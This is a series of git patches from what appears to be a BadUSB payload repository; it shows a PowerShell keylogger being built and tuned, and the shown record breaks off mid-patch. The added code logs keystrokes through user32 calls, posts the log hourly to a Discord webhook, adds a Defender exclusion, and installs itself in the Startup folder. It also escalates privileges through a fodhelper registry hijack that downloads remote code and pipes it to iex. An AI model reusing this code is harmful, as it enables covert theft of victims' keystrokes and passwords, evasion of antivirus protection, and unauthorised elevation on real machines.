From de6680bfa07beb87e90fc56d62e13a1ef4ac3ab6 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 12:12:55 -0600 Subject: [PATCH 01/31] Delete Keylogger.ps1 --- Payloads/Flip-Keylogger/Keylogger.ps1 | 1 - 1 file changed, 1 deletion(-) delete mode 100644 Payloads/Flip-Keylogger/Keylogger.ps1 diff --git a/Payloads/Flip-Keylogger/Keylogger.ps1 b/Payloads/Flip-Keylogger/Keylogger.ps1 deleted file mode 100644 index 84f86ba..0000000 --- a/Payloads/Flip-Keylogger/Keylogger.ps1 +++ /dev/null @@ -1 +0,0 @@ -COMING SOON From 3b0035c7e62f17f66e66b5cdcb0f2b209164217a Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 12:13:39 -0600 Subject: [PATCH 02/31] Create placeholder --- Payloads/Flip-Keylogger/placeholder | 1 + 1 file changed, 1 insertion(+) create mode 100644 Payloads/Flip-Keylogger/placeholder diff --git a/Payloads/Flip-Keylogger/placeholder b/Payloads/Flip-Keylogger/placeholder new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/Payloads/Flip-Keylogger/placeholder @@ -0,0 +1 @@ + From b2880e8a713dd40edb952918c894d7c880983ed3 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 12:14:01 -0600 Subject: [PATCH 03/31] Add files via upload --- Payloads/Flip-Keylogger/-keys.ps1 | 62 ++++++++++++++++++++++ Payloads/Flip-Keylogger/-logs.ps1 | 88 +++++++++++++++++++++++++++++++ Payloads/Flip-Keylogger/-p.cmd | 10 ++++ 3 files changed, 160 insertions(+) create mode 100644 Payloads/Flip-Keylogger/-keys.ps1 create mode 100644 Payloads/Flip-Keylogger/-logs.ps1 create mode 100644 Payloads/Flip-Keylogger/-p.cmd diff --git a/Payloads/Flip-Keylogger/-keys.ps1 b/Payloads/Flip-Keylogger/-keys.ps1 new file mode 100644 index 0000000..282a2cf --- /dev/null +++ b/Payloads/Flip-Keylogger/-keys.ps1 @@ -0,0 +1,62 @@ +function XXXlog($Path="$env:appdata\-locker\$env:UserName-loot.txt"){ + $signatures = @' + [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] + public static extern short GetAsyncKeyState(int virtualKeyCode); + [DllImport("user32.dll", CharSet=CharSet.Auto)] + public static extern int GetKeyboardState(byte[] keystate); + [DllImport("user32.dll", CharSet=CharSet.Auto)] + public static extern int MapVirtualKey(uint uCode, int uMapType); + [DllImport("user32.dll", CharSet=CharSet.Auto)] + public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); +'@ + + $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru + + + $null = New-Item -Path $Path -ItemType File -Force + + try + { + Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red + + while ($true) { + Start-Sleep -Milliseconds 40 + + + for ($ascii = 9; $ascii -le 254; $ascii++) { + + $state = $API::GetAsyncKeyState($ascii) + + + if ($state -eq -32767) { + $null = [console]::CapsLock + + + $virtualKey = $API::MapVirtualKey($ascii, 3) + + + $kbstate = New-Object Byte[] 256 + $checkkbstate = $API::GetKeyboardState($kbstate) + + + $mychar = New-Object -TypeName System.Text.StringBuilder + + $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0) + + if ($success) + { + + [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) + } + } + } + } + } + finally + { + + #notepad $Path + } +} + +XXXlog diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1 new file mode 100644 index 0000000..55a7a0a --- /dev/null +++ b/Payloads/Flip-Keylogger/-logs.ps1 @@ -0,0 +1,88 @@ +# powershell log scheduler +# created by : C0SM0 +# Modified by : Jakoby + +$Path="$env:appdata\-locker\$env:UserName-loot.txt" + +function Upload-Discord { + +[CmdletBinding()] +param ( + [parameter(Position=0,Mandatory=$False)] + [string]$file, + [parameter(Position=1,Mandatory=$False)] + [string]$text +) + +$hookurl = "$dc" + +$Body = @{ + 'username' = $env:username + 'content' = $text +} + +if (-not ([string]::IsNullOrEmpty($text))){ +Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; + +if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} +} + +if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:tmp/$ZIP"} + + + +# times logs will be sent [keep in military time] +$logTimes = @( + '00:00:00', + '01:00:00', + '02:00:00', + '03:00:00', + '04:00:00', + '05:00:00', + '06:00:00', + '07:00:00', + '08:00:00', + '09:00:00', + '10:00:00', + '11:00:00', + '12:00:00', + '13:00:00', + '14:00:00', + '15:00:00', + '16:00:00', + '17:00:00', + '18:00:00', + '19:00:00', + '20:00:00', + '21:00:00', + '22:00:00', + '23:00:00' +) + +# sort the times in chronological order +$logTimes = $logTimes | Sort-Object + +# ensure keylogger runs every day +while ($true) { + + # run keylogger for each trigger time + foreach ($t in $logTimes) + { + # checks if time passed already + if((Get-Date) -lt (Get-Date -Date $t)) + { + # sleeps until next time is reached + while ((Get-Date -Date $t) -gt (Get-Date)) + { + # sleeps + (Get-Date -Date $t) - (Get-Date) | Start-Sleep + } + + # runs keylogger + Upload-Discord -file $Path + echo "" > $Path + #powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/keys.ps1" + + } + } +} \ No newline at end of file diff --git a/Payloads/Flip-Keylogger/-p.cmd b/Payloads/Flip-Keylogger/-p.cmd new file mode 100644 index 0000000..1594907 --- /dev/null +++ b/Payloads/Flip-Keylogger/-p.cmd @@ -0,0 +1,10 @@ +@echo off +powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/keys.ps1" +powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/logs.ps1" + + + + + + + From 3166d805e68b89933755570c9bddf6304b031bd4 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 12:15:55 -0600 Subject: [PATCH 04/31] Delete placeholder --- Payloads/Flip-Keylogger/placeholder | 1 - 1 file changed, 1 deletion(-) delete mode 100644 Payloads/Flip-Keylogger/placeholder diff --git a/Payloads/Flip-Keylogger/placeholder b/Payloads/Flip-Keylogger/placeholder deleted file mode 100644 index 8b13789..0000000 --- a/Payloads/Flip-Keylogger/placeholder +++ /dev/null @@ -1 +0,0 @@ - From edc4c516b8ac973d4a7c368b311c7c922cd5d970 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 12:17:13 -0600 Subject: [PATCH 05/31] Update -p.cmd --- Payloads/Flip-Keylogger/-p.cmd | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Payloads/Flip-Keylogger/-p.cmd b/Payloads/Flip-Keylogger/-p.cmd index 1594907..5531dae 100644 --- a/Payloads/Flip-Keylogger/-p.cmd +++ b/Payloads/Flip-Keylogger/-p.cmd @@ -1,6 +1,6 @@ @echo off -powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/keys.ps1" -powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/logs.ps1" +powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/-keys.ps1" +powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/-logs.ps1" From b79f6a462c0254ed72a1d362257f97452fe12a81 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 12:17:22 -0600 Subject: [PATCH 06/31] Update -p.cmd --- Payloads/Flip-Keylogger/-p.cmd | 7 ------- 1 file changed, 7 deletions(-) diff --git a/Payloads/Flip-Keylogger/-p.cmd b/Payloads/Flip-Keylogger/-p.cmd index 5531dae..0c49b86 100644 --- a/Payloads/Flip-Keylogger/-p.cmd +++ b/Payloads/Flip-Keylogger/-p.cmd @@ -1,10 +1,3 @@ @echo off powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/-keys.ps1" powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/-logs.ps1" - - - - - - - From 526b040c33dfc2e8df7295edad32936a9ebe3a34 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 12:21:45 -0600 Subject: [PATCH 07/31] Create s1.ps1 --- Payloads/Flip-Keylogger/s1.ps1 | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 Payloads/Flip-Keylogger/s1.ps1 diff --git a/Payloads/Flip-Keylogger/s1.ps1 b/Payloads/Flip-Keylogger/s1.ps1 new file mode 100644 index 0000000..67b95a6 --- /dev/null +++ b/Payloads/Flip-Keylogger/s1.ps1 @@ -0,0 +1,11 @@ +if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"} + +Add-MpPreference -ExclusionPath $env:appdata/-locker + +echo $dc > "$env:appdata\-locker\wh.txt" + +iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-p.cmd -o "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd" +iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-keys.ps1 -o "$env:appdata\-locker\-keys.ps1" +iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-logs.ps1 -o "$env:appdata\-locker\-logs.ps1" + +start-process "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd" From 40d89b00f2b481a678e3a4383b4f92b5625c7c57 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 12:22:02 -0600 Subject: [PATCH 08/31] Rename s1.ps1 to s2.ps1 --- Payloads/Flip-Keylogger/{s1.ps1 => s2.ps1} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename Payloads/Flip-Keylogger/{s1.ps1 => s2.ps1} (100%) diff --git a/Payloads/Flip-Keylogger/s1.ps1 b/Payloads/Flip-Keylogger/s2.ps1 similarity index 100% rename from Payloads/Flip-Keylogger/s1.ps1 rename to Payloads/Flip-Keylogger/s2.ps1 From 70301691970b16b2501becc9a7dec2a07d7d202c Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 12:23:23 -0600 Subject: [PATCH 09/31] Create s1.ps1 --- Payloads/Flip-Keylogger/s1.ps1 | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 Payloads/Flip-Keylogger/s1.ps1 diff --git a/Payloads/Flip-Keylogger/s1.ps1 b/Payloads/Flip-Keylogger/s1.ps1 new file mode 100644 index 0000000..f19168e --- /dev/null +++ b/Payloads/Flip-Keylogger/s1.ps1 @@ -0,0 +1,14 @@ +function s1 { + $user = "$env:COMPUTERNAME\$env:USERNAME" + $isAdmin = (Get-LocalGroupMember 'Administrators').Name -contains $user +if($isAdmin){ + $259="powershell.exe -noexit iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 | iex"; + reg add "HKCU\Software\Classes\.259\Shell\Open\command" /d $259 /f;reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".259" /f;fodhelper.exe;Start-Sleep -s 3;reg delete "HKCU\Software\Classes\.259\" /f;reg delete "HKCU\Software\Classes\ms-settings\" /f; + + } + else{ + Break + } +} + +s1 From 0739f8f1549ffc74dc88d9fc0bc7fe218c38d8b8 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 12:31:40 -0600 Subject: [PATCH 10/31] Update -logs.ps1 --- Payloads/Flip-Keylogger/-logs.ps1 | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1 index 55a7a0a..edccb9a 100644 --- a/Payloads/Flip-Keylogger/-logs.ps1 +++ b/Payloads/Flip-Keylogger/-logs.ps1 @@ -45,10 +45,10 @@ $logTimes = @( '09:00:00', '10:00:00', '11:00:00', - '12:00:00', - '13:00:00', - '14:00:00', - '15:00:00', + '12:34:00', + '12:34:15', + '12:34:30', + '12:34:45', '16:00:00', '17:00:00', '18:00:00', @@ -85,4 +85,4 @@ while ($true) { } } -} \ No newline at end of file +} From 769672b74aeb7f5f7124547d22ce8b09038fd0c6 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 12:44:21 -0600 Subject: [PATCH 11/31] Update s1.ps1 --- Payloads/Flip-Keylogger/s1.ps1 | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Payloads/Flip-Keylogger/s1.ps1 b/Payloads/Flip-Keylogger/s1.ps1 index f19168e..c945fee 100644 --- a/Payloads/Flip-Keylogger/s1.ps1 +++ b/Payloads/Flip-Keylogger/s1.ps1 @@ -11,4 +11,6 @@ if($isAdmin){ } } +if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"};echo $dc > "$env:appdata\-locker\wh.txt"; + s1 From 477b87d856b6bbf0eea367a1e485d5f86b05a202 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 12:47:21 -0600 Subject: [PATCH 12/31] Update s1.ps1 --- Payloads/Flip-Keylogger/s1.ps1 | 18 ++---------------- 1 file changed, 2 insertions(+), 16 deletions(-) diff --git a/Payloads/Flip-Keylogger/s1.ps1 b/Payloads/Flip-Keylogger/s1.ps1 index c945fee..ae9b4c6 100644 --- a/Payloads/Flip-Keylogger/s1.ps1 +++ b/Payloads/Flip-Keylogger/s1.ps1 @@ -1,16 +1,2 @@ -function s1 { - $user = "$env:COMPUTERNAME\$env:USERNAME" - $isAdmin = (Get-LocalGroupMember 'Administrators').Name -contains $user -if($isAdmin){ - $259="powershell.exe -noexit iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 | iex"; - reg add "HKCU\Software\Classes\.259\Shell\Open\command" /d $259 /f;reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".259" /f;fodhelper.exe;Start-Sleep -s 3;reg delete "HKCU\Software\Classes\.259\" /f;reg delete "HKCU\Software\Classes\ms-settings\" /f; - - } - else{ - Break - } -} - -if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"};echo $dc > "$env:appdata\-locker\wh.txt"; - -s1 +if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"}; +echo $dc > "$env:appdata\-locker\wh.txt"; From e956f4f89742411203c2286caaf031000b6e560f Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 12:51:51 -0600 Subject: [PATCH 13/31] Update s1.ps1 --- Payloads/Flip-Keylogger/s1.ps1 | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/Payloads/Flip-Keylogger/s1.ps1 b/Payloads/Flip-Keylogger/s1.ps1 index ae9b4c6..39ae789 100644 --- a/Payloads/Flip-Keylogger/s1.ps1 +++ b/Payloads/Flip-Keylogger/s1.ps1 @@ -1,2 +1,17 @@ if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"}; echo $dc > "$env:appdata\-locker\wh.txt"; + +function s1 { + $user = "$env:COMPUTERNAME\$env:USERNAME" + $isAdmin = (Get-LocalGroupMember 'Administrators').Name -contains $user +if($isAdmin){ + $259="powershell.exe -noexit iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 | iex"; + reg add "HKCU\Software\Classes\.259\Shell\Open\command" /d $259 /f;reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".259" /f;fodhelper.exe;Start-Sleep -s 3;reg delete "HKCU\Software\Classes\.259\" /f;reg delete "HKCU\Software\Classes\ms-settings\" /f; + + } + else{ + Break + } +} + +s1 From 8df1d19f9850dc33844fd17bd90ce9c8ddb9e813 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 12:52:03 -0600 Subject: [PATCH 14/31] Update s1.ps1 --- Payloads/Flip-Keylogger/s1.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-Keylogger/s1.ps1 b/Payloads/Flip-Keylogger/s1.ps1 index 39ae789..57edda1 100644 --- a/Payloads/Flip-Keylogger/s1.ps1 +++ b/Payloads/Flip-Keylogger/s1.ps1 @@ -5,7 +5,7 @@ function s1 { $user = "$env:COMPUTERNAME\$env:USERNAME" $isAdmin = (Get-LocalGroupMember 'Administrators').Name -contains $user if($isAdmin){ - $259="powershell.exe -noexit iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 | iex"; + $259="powershell.exe -w h iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 | iex"; reg add "HKCU\Software\Classes\.259\Shell\Open\command" /d $259 /f;reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".259" /f;fodhelper.exe;Start-Sleep -s 3;reg delete "HKCU\Software\Classes\.259\" /f;reg delete "HKCU\Software\Classes\ms-settings\" /f; } From 4a42decb6bb6f3e4c864ffbe8073509eb11efc35 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 12:59:38 -0600 Subject: [PATCH 15/31] Update s2.ps1 --- Payloads/Flip-Keylogger/s2.ps1 | 4 ---- 1 file changed, 4 deletions(-) diff --git a/Payloads/Flip-Keylogger/s2.ps1 b/Payloads/Flip-Keylogger/s2.ps1 index 67b95a6..35f9358 100644 --- a/Payloads/Flip-Keylogger/s2.ps1 +++ b/Payloads/Flip-Keylogger/s2.ps1 @@ -1,9 +1,5 @@ -if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"} - Add-MpPreference -ExclusionPath $env:appdata/-locker -echo $dc > "$env:appdata\-locker\wh.txt" - iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-p.cmd -o "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd" iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-keys.ps1 -o "$env:appdata\-locker\-keys.ps1" iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-logs.ps1 -o "$env:appdata\-locker\-logs.ps1" From c6b07143b0749f10adebe8eb2e6b78963b3febbf Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 13:06:16 -0600 Subject: [PATCH 16/31] Update -logs.ps1 --- Payloads/Flip-Keylogger/-logs.ps1 | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1 index edccb9a..3332e35 100644 --- a/Payloads/Flip-Keylogger/-logs.ps1 +++ b/Payloads/Flip-Keylogger/-logs.ps1 @@ -45,10 +45,10 @@ $logTimes = @( '09:00:00', '10:00:00', '11:00:00', - '12:34:00', - '12:34:15', - '12:34:30', - '12:34:45', + '13:15:00', + '13:15:15', + '13:15:30', + '13:15:45', '16:00:00', '17:00:00', '18:00:00', From a9c1ae5c7836c164e78f6cb7794b2a9bb9594c5c Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 13:16:08 -0600 Subject: [PATCH 17/31] Update s1.ps1 --- Payloads/Flip-Keylogger/s1.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-Keylogger/s1.ps1 b/Payloads/Flip-Keylogger/s1.ps1 index 57edda1..39ae789 100644 --- a/Payloads/Flip-Keylogger/s1.ps1 +++ b/Payloads/Flip-Keylogger/s1.ps1 @@ -5,7 +5,7 @@ function s1 { $user = "$env:COMPUTERNAME\$env:USERNAME" $isAdmin = (Get-LocalGroupMember 'Administrators').Name -contains $user if($isAdmin){ - $259="powershell.exe -w h iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 | iex"; + $259="powershell.exe -noexit iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 | iex"; reg add "HKCU\Software\Classes\.259\Shell\Open\command" /d $259 /f;reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".259" /f;fodhelper.exe;Start-Sleep -s 3;reg delete "HKCU\Software\Classes\.259\" /f;reg delete "HKCU\Software\Classes\ms-settings\" /f; } From 6ac65679cfc0bca963ef803d835ccdb31c5d5a62 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 13:20:39 -0600 Subject: [PATCH 18/31] Update -logs.ps1 --- Payloads/Flip-Keylogger/-logs.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1 index 3332e35..04957ec 100644 --- a/Payloads/Flip-Keylogger/-logs.ps1 +++ b/Payloads/Flip-Keylogger/-logs.ps1 @@ -81,7 +81,7 @@ while ($true) { # runs keylogger Upload-Discord -file $Path echo "" > $Path - #powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/keys.ps1" + } } From ce0263a6c5e52195bdaddb62daeb73119249dcb8 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 13:22:54 -0600 Subject: [PATCH 19/31] Update -p.cmd --- Payloads/Flip-Keylogger/-p.cmd | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Payloads/Flip-Keylogger/-p.cmd b/Payloads/Flip-Keylogger/-p.cmd index 0c49b86..8e0e08d 100644 --- a/Payloads/Flip-Keylogger/-p.cmd +++ b/Payloads/Flip-Keylogger/-p.cmd @@ -1,3 +1,3 @@ @echo off -powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/-keys.ps1" -powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/-logs.ps1" +powershell Start-Process powershell.exe -windowstyle hidden -ExecutionPolicy bypass "$env:appdata/-locker/-keys.ps1" +powershell Start-Process powershell.exe -windowstyle hidden -ExecutionPolicy bypass "$env:appdata/-locker/-logs.ps1" From 890c5b4e2ad0a9f05ada3cb7434d95dd0387e148 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 13:23:15 -0600 Subject: [PATCH 20/31] Update s1.ps1 --- Payloads/Flip-Keylogger/s1.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-Keylogger/s1.ps1 b/Payloads/Flip-Keylogger/s1.ps1 index 39ae789..57edda1 100644 --- a/Payloads/Flip-Keylogger/s1.ps1 +++ b/Payloads/Flip-Keylogger/s1.ps1 @@ -5,7 +5,7 @@ function s1 { $user = "$env:COMPUTERNAME\$env:USERNAME" $isAdmin = (Get-LocalGroupMember 'Administrators').Name -contains $user if($isAdmin){ - $259="powershell.exe -noexit iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 | iex"; + $259="powershell.exe -w h iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 | iex"; reg add "HKCU\Software\Classes\.259\Shell\Open\command" /d $259 /f;reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".259" /f;fodhelper.exe;Start-Sleep -s 3;reg delete "HKCU\Software\Classes\.259\" /f;reg delete "HKCU\Software\Classes\ms-settings\" /f; } From b9fdcf3ce207fb72ac50aab7cbf87d2b5dc816ef Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 13:38:37 -0600 Subject: [PATCH 21/31] Update -p.cmd --- Payloads/Flip-Keylogger/-p.cmd | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Payloads/Flip-Keylogger/-p.cmd b/Payloads/Flip-Keylogger/-p.cmd index 8e0e08d..07c8208 100644 --- a/Payloads/Flip-Keylogger/-p.cmd +++ b/Payloads/Flip-Keylogger/-p.cmd @@ -1,3 +1,3 @@ @echo off -powershell Start-Process powershell.exe -windowstyle hidden -ExecutionPolicy bypass "$env:appdata/-locker/-keys.ps1" -powershell Start-Process powershell.exe -windowstyle hidden -ExecutionPolicy bypass "$env:appdata/-locker/-logs.ps1" +powershell Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-keys.ps1" +powershell Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-logs.ps1" From fd9ffd79f1d1375388e0682716759e7e0ccd59f9 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 13:47:36 -0600 Subject: [PATCH 22/31] Update -logs.ps1 --- Payloads/Flip-Keylogger/-logs.ps1 | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1 index 04957ec..eea0671 100644 --- a/Payloads/Flip-Keylogger/-logs.ps1 +++ b/Payloads/Flip-Keylogger/-logs.ps1 @@ -45,10 +45,10 @@ $logTimes = @( '09:00:00', '10:00:00', '11:00:00', - '13:15:00', - '13:15:15', - '13:15:30', - '13:15:45', + '13:52:00', + '13:52:15', + '13:52:30', + '13:52:45', '16:00:00', '17:00:00', '18:00:00', From 8d595239045c2153930a63e359024fd119db07c3 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 13:58:13 -0600 Subject: [PATCH 23/31] Update -logs.ps1 --- Payloads/Flip-Keylogger/-logs.ps1 | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1 index eea0671..ddfa8b8 100644 --- a/Payloads/Flip-Keylogger/-logs.ps1 +++ b/Payloads/Flip-Keylogger/-logs.ps1 @@ -45,10 +45,10 @@ $logTimes = @( '09:00:00', '10:00:00', '11:00:00', - '13:52:00', - '13:52:15', - '13:52:30', - '13:52:45', + '14:03:00', + '14:03:15', + '14:03:30', + '14:03:45', '16:00:00', '17:00:00', '18:00:00', From 2cd44ba366233add00e644b3a7cdafe43c33bb42 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 14:05:02 -0600 Subject: [PATCH 24/31] Update -logs.ps1 --- Payloads/Flip-Keylogger/-logs.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1 index ddfa8b8..e3d735a 100644 --- a/Payloads/Flip-Keylogger/-logs.ps1 +++ b/Payloads/Flip-Keylogger/-logs.ps1 @@ -79,7 +79,7 @@ while ($true) { } # runs keylogger - Upload-Discord -file $Path + Upload-Discord -file $Path echo "" > $Path From 66fbf5a5e71b04fde8e133c7430526e3562f91e2 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 14:06:42 -0600 Subject: [PATCH 25/31] Update -logs.ps1 --- Payloads/Flip-Keylogger/-logs.ps1 | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1 index e3d735a..fe7e521 100644 --- a/Payloads/Flip-Keylogger/-logs.ps1 +++ b/Payloads/Flip-Keylogger/-logs.ps1 @@ -4,6 +4,8 @@ $Path="$env:appdata\-locker\$env:UserName-loot.txt" +$dc = [IO.File]::ReadAllText(".\wh.txt") + function Upload-Discord { [CmdletBinding()] From cf9f3969aaa4b2d07d212073ff89326f4380bfb4 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 14:07:06 -0600 Subject: [PATCH 26/31] Update -logs.ps1 --- Payloads/Flip-Keylogger/-logs.ps1 | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1 index fe7e521..f8c9cdb 100644 --- a/Payloads/Flip-Keylogger/-logs.ps1 +++ b/Payloads/Flip-Keylogger/-logs.ps1 @@ -47,10 +47,10 @@ $logTimes = @( '09:00:00', '10:00:00', '11:00:00', - '14:03:00', - '14:03:15', - '14:03:30', - '14:03:45', + '14:11:00', + '14:11:15', + '14:11:30', + '14:11:45', '16:00:00', '17:00:00', '18:00:00', From 